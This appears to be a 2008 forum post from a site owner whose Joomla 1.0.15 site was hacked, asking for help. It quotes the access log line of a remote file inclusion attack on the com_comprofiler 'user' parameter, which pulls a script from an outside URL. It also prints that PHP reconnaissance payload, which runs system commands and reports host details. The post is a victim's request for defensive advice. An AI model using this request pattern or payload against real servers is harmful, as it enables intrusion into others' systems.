Hi, my site (joomla 1.0.15 stable) has been hacked with the following command
200.93.147.155 - - [25/Sep/2008:04:56:49 +0200] "GET /mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt??? HTTP/1.1" 200 37503 "-" "libwww-perl/5.805"
where urlcrack.txt contain the following text
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "narasaon
";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "narasaon was here ..
";
echo "uname -a: $un
";
echo "os: $os
";
echo "uptime: $up
";
echo "id: $id1
";
echo "pwd: $pwd1
";
echo "php: $php1
";
echo "software: $sof1
";
echo "server-name: $name1
";
echo "server-ip: $ip1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;
Thanks to this code, hackers are able to send thousand of emails with our server.
Thanks in advance for any suggestion
